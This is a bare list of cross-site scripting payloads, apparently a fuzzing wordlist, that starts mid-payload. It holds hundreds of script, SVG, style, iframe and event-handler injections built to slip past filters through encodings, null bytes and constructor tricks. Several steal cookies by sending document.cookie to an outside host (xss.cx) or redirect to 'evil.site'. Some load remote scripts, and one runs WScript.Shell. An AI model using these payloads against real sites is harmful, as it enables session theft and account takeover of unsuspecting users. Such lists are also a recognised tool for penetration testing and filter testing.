xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script># <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script> <script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script> "/><script x> confirm(1) </script 1=2 <script x> confirm(1) </script 1=2 <script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0″//(%000000%0dconfirm(1)// <script>({0:#0=confirm/#0#/#0#(0)})</script> <script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script> "<script>1-confirm(0);</script>"/> "/><script>+-+-1-+-+confirm(1)</script> <script>+-+-1-+-+confirm(1)</script> <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script> <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});confirm(Safe.get())</script> <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <script>a='abc\*chr*\';log(*num*)//def';</script> "<script>'confirm(0)%3B<%2Fscript>" "\"><script>'confirm(0)%3B<%2Fscript>", <script>'confirm(0)%3B<%2Fscript> ><script>'confirm(0)%3B<%2Fscript> "<script>confirm(0);</script>" "><"script">"confirm(0)"</"script"> "\"><script>confirm(0)</script>", <script>confirm(0);</script> ><script>confirm(0)</script> "'><script>confirm(1)</script>", <sc'+'ript>confirm(1)</script> <script>confirm(1)</script> >"<>"<script>confirm(1)</script> [<script>]=*confirm(1)</script> ∀㸀㰀script㸀confirm(1)㰀/script㸀 <%<!--'%><script>confirm(1);</script --> <%<!--'%><script>confirm(1);</script --> "/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)> "\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>" >"<>"<script>confirm(2)</script> <script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> "<script>confirm(String.fromCharCode(88,83,83));</script>" "\"><script>confirm(String.fromCharCode(88,83,83));</script>", <script>confirm(String.fromCharCode(88,83,83));</script> ><script>confirm(String.fromCharCode(88,83,83));</script> <script>/*confirm("Woops");*/</script> <script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> <script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>confirm(document.head.childNodes[3].text)</script> <script>confirm(document.head.innerHTML.substr(146,20));</script> >"><script>confirm(document.location)</script>& <script>confirm(""no")</script> <script>confirm(x.y[0])</script> <script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script> "'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script> "`'><script>*chr*log(*num*)</script> <script>document.body.innerHTML="<h1>XSS-Here</h1>"</script> <script>document.write(Array(184).join('<marquee>'))</script> "/><script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script> <script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script> <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script> <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <script>if("x\*chr*".length==1) { log(*num*);}</script> </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> "`'><script>lo*chr*g(*num*)</script> "`'><script>lo*chr*g(*num*)</script> "'`><script>log*chr*(*num*)</script> <script/onload=confirm(1)></script> \"><script>prompt(1)</script> </script><script>confirm(3)</script> </script><script>/*var a="/*""'/**/;confirm(1);//</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script> <script/src=data:text/javascript,alert(1)></script> <script/src=data:text/javascript,alert(1)></script> ? "/><script+src=data:,confirm(1)<!-- <script+src=data:,confirm(1)<!-- "/><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? <script/src=//xss.cx>/* <script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script> </script><svg '//" </script><svg onload='-/"/-confirm(1)//' </script><svg onload='-/"/-confirm(1)//'" <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/v>confirm(/@jackmasa/)</script> <script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script> <script>var location={};</script> <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script> <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script># `'"><script>window['log*chr*'](*num*)</script> '<script>window.onload=function(){document.forms[0].message.value='1';}</script> <script>x="confirm(1)".replace(/.+/,eval)//"</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> <script>x=""!=prompt(9)!="";y=42;</script> <script>x=""%prompt(9)%"";y=42;</script> <script>x=""&&prompt(9)&&"";y=42;</script> <script>x=""&prompt(9)&"";y=42;</script> <script>x=""*prompt(9)*"";y=42;</script> <script>x=""+prompt(9)+"";y=42;</script> <script>x=""-prompt(9)-"";y=42;</script> <script>x=""/prompt(9)/"";y=42;</script> <script>x=""<<prompt(9)<<"";y=42;</script> <script>x=""<=prompt(9)<="";y=42;</script> <script>x=""<prompt(9)<"";y=42;</script> <script>x=""===prompt(9)==="";y=42;</script> <script>x=""==prompt(9)=="";y=42;</script> <script>x="">=prompt(9)>="";y=42;</script> <script>x="">>>prompt(9)>>>"";y=42;</script> <script>x="">>prompt(9)>>"";y=42;</script> <script>x="">prompt(9)>"";y=42;</script> <script>x=""?prompt(9):"";y=42;</script> <script>x=""^prompt(9)^"";y=42;</script> <script>x=""|prompt(9)|"";y=42;</script> <script>x=""||prompt(9)||"";y=42;</script> "><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt> <scri\x00pt>confirm(1);</scri%00pt> setTimeout(['confirm(4)']); <span id="x" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script> stop, open, print && confirm(1) </style  ><script   :-(>/**/confirm(document.location)/**/</script   :-( <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; phpinfo(); __halt_compiler(); ?></h1> <style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style> <style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa <style/onload = !-confirm(1)> <style/onload=confirm(1)> <style/onload="javascript:if('[object Object]'=={}&&1==[1])confirm(1);"> <style/onload=<!--	> confirm (1)> <style/onload=prompt('XSS') <style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style> <///style///><span %2F onmousemove='confirm(1)'>SPAN <style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style> <svg contentScriptType=text/vbs><script>MsgBox+1 <svg contentScriptType=text/vbs><script>XSS <svg id=1 onload=confirm(1)> <svg onload=confirm(1) "><svg onload="confirm(7)"> <svg onload="confirm(7)"> <svg onload=eval(URL)> <svg onload=eval(document.cookie)> <svg onload=eval(window.name)> <svg xml:base="data:text/html,<script>confirm(1)</script>"><a xlink:href="#"><circle r="40"></circle></a></svg> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:confirm(1)"></g></svg> <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:confirm(1)" begin="0s" dur="0.1s" fill="freeze"/> <svg></ y="><x" onload=confirm(4)> <svg><doh onload=confirm(1)> <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E"> "<svg/onload=confirm(0);prompt(0);>" <svg/onload=confirm(0);prompt(0);> <svg/onload=confirm(1) "/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)> "\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>" <svg/onload='javascript0x00:void(0)%00?void(0):confirm(1)'> "<svg/onload=prompt(0);>" <svg/onload=prompt(0);> "<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>" "\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>", <svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);> ><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);> <svg/onload=window.onerror=confirm;throw/5/;// <svg/onload=window.onerror=confirm;throw/XSS/;// <svg/onload=window.onerror=confirm;throw/XSS/;//" <svg><script ?>confirm(1) <svg><script ?>confirm(1); <svg><script onlypossibleinopera:-)> confirm(1) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script> "/><svg><script>//
confirm(1);</script </svg> <svg><script>//
confirm(1);</script </svg> <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script> <svg><script>confirm(/1/)</script> <svg><script>confirm("");confirm('yes')//no")</script> <svg><script>a<svg//onload=confirm(2) />lert(1)</script> <svg><script>location=<>javascript&#x3A;confirm(1)<!/></script> <svg><script>/**/confirm(3)//*/</script></svg> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg> <svg><style><img src=x onerror=confirm(1)></svg> </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm(1) ?t=confirm(1)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)' test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN <textarea autofocus onfocus=confirm(3)> <textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea> <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> "/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea name='file"; filename="test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>'> "<textarea onmousemove='confirm(1);'>" <textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> --> </title><frameset><frame src="data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>"> </title><frameset><frame src="data:text/html,<script>confirm(1)</script>"> <ul><li><svg onload="confirm(1)"></li></ul> <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:confirm(document.location);"> <var onmouseover="prompt(1)">On Mouse Over</var> <var onmouseover="prompt(1)">On Mouse Over</var>? "<video src=. onerror=prompt(0)>" <video src=. onerror=prompt(0)> <video src="x" onloadstart="confirm(1)"> <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 <video><source o?UTF-8?Q?n?error="confirm(1)"> <x data-bind=".:confirm(1)"> <x data-bind=".:\u0061lert(1)"> <x onload'=confirm(1) < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < \x3C > > \x3E < < \x3c > > \x3e <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table> <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> <xmp><img alt="</xmp><img src=xx:x onerror=confirm(1)//"> xss--><!--<script>xss x”</title><img src%3dx onerror%3dconfirm(1)> @"><img src=x/onerror=confirm(1)>xss <script>x=new ActiveXObject("WScript.Shell");x.run('calc');</script> "><<x>script>confirm(2)<<x>/<x>script> <img src=x onerror="document.location='http://xss.cx'";> !#$%&'*+-/=?^_`{}|[email protected] ~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat(' <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table> <style/></style><img src=1 onerror=confirm(1)></style> <script> x="<%"; </script> <div title="%></script>"<img src=1 onerror=confirm(1)>"></div> <? foo="><script>confirm(1)</script>"> data:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1) '">><marquee><img src=x onerror=confirm(1)></marquee> <div contextmenu=x>right-click<menu id=x onshow=confirm(1)> "><b/onclick="javascript:window.window.window['confirm'](1)">bold <body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'> <IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5> %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e <script>``.constructor.constructor`confirm\`1\````</script> eval("\x61\x6c\x65\x72\x74\x28\x31\x29”) <script>var%20x%20=%20“a”;%20confirm(1);//”;</script> <source srcset="x"><img onerror="confirm(5)"></picture> <svg><script>confirm`1`<p><svg><script>confirm`1`<p> <script>``.constructor.constructor`confirm\`1\````</script> <i/style=x=x/**/(confirm(1))('\')expression\')> <i/style=x=x/**/n(confirm(1))('\')expressio\')> <div style='x:anytext/**/xxxx/**/n(confirm(1)) ("\"))))))expressio\")'>aa</div> // <script>write(“<img/src=//xss.cx/?”+cookie.replace(/\s/g,"")+“>”)></script> <base href="javascript:\"> <a href="//%0aconfirm(2);//">XSS</a> <base href="javascript:\"> <a href="//%0a%0dconfirm(2);//">XSS</a> <base href="javascript:\"> <a href="//%00confirm(2);//">XSS</a> <base href="javascript:\"> <a href="//xss.cx/xss.js">XSS</a> <script src="//⒕₨"></script>) <anything onmouseover=javascript:confirm(1)> <%00/title> <""/title> </title""> </title id=""> <a href='javascript:http://@cc_on/confirm%28location%29'>click</a> <img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="> <a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="><img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></a> "> "><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> "><iframe src=http://xss.cx onload=confirm(8) < % E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8% "><svg/onload=prompt(1)> "onresize=prompt(1)> <svg/onload=prompt(1) <svg><script>prompt(1)<b> <svg><script>prompt(1)</script> <script>eval.call`${'prompt\x281)'}`</script> <script>prompt.call`${1}`</script> --!><svg/onload=prompt(1) <p class="comment" title=""><svg/a="></p> <p class="comment" title=""onload='/*"></p> <p class="comment" title="*/prompt(1)'"></p> "><svg/a=#"onload='/*#*/prompt(1)' "><script x=#"async=#"src="//⒛₨ [U+2028]prompt(1)[U+2028]--> <ſvg><ſcript/href=//⒕₨> <ſcript/async/src=//⒛₨> <img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨"> "><script>`#${prompt(1)}#`</script> <iframe/*%%%%25%%%25*/src='javascript:vbscript:%0b%0a/**/;//:http://www.google.com/?=%0a/**/javascript:%0a/*oleeeeeeeeeeeeeee*/alert(2);'> <A HREF="javascript	:alert(1)"> <%= puts "test" %> '"--></style></script><script>alert(0x0009BE)</script> <a href="javascript:history:alert(this.history.length)">click</a> xss=<link rel=import href=http://xss.cx/xss.js > <% a=%><iframe/onload=alert(1)//> <%/z=%><p/onresize=alert(1)//> <%/z=%><p/onresize=alert(1)//> <xml/></xml><iframe/onload=alert(1)> <xmp/></xmp><iframe/onload=alert(1)> <comment/></comment><iframe/onload=alert(1)> <fORm/hello^waf/aCTIon=j	avas	cript
:alert/**/(docu	ment.coo	kie)><InPuT/TyPe=submit <iframe onload="(function*(){}).constructor('alert(location)')().next()"> <iframe%20onload="new%20Promise($=>alert(location))"> <iframe onload=alert.call(...[top,location])> <iframe onload=`${alert(location)}`> <title/></title><iframe/onload=alert(1)> <element onpointerover=alert(1)> <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div> <element onpointerover=alert(1)> <a b="c">d</a> <![<CDATA[C%Ada b="c":]]]> <![ <![C b="c"> <![CDb m="c"> <![CDAĹĹ@ <![CDAT<! <!DOCTY a=<script>alert(1);/*&b=*/</script> <!DOCTY. <?xml version="2.666666666666666666667666666"> <?xml standalone?> <script>a="<!--";//</script>alert(1)--></script> <script>a="<%"//</script>alert(1)//%></script> <svg><script xlink:href="url(#)"></script></svg> <base href="mailto://any/<img src="bod#y"></script> \x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//> <math><XSS href="javascript:alert(location)">xss <math><mrow href=javascript:alert(1)>XSS</mrow></math> <input+name=xss+value="%26lt;script>alert%26lpar;1)%26lt;/script>"> <script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script> <script>[{get[alert(1)]()false}]</script> <script>a = {get[alert`1`](){}}</script> <svg><a xyz:href=123><text>test</text></svg> /* RFI STOP */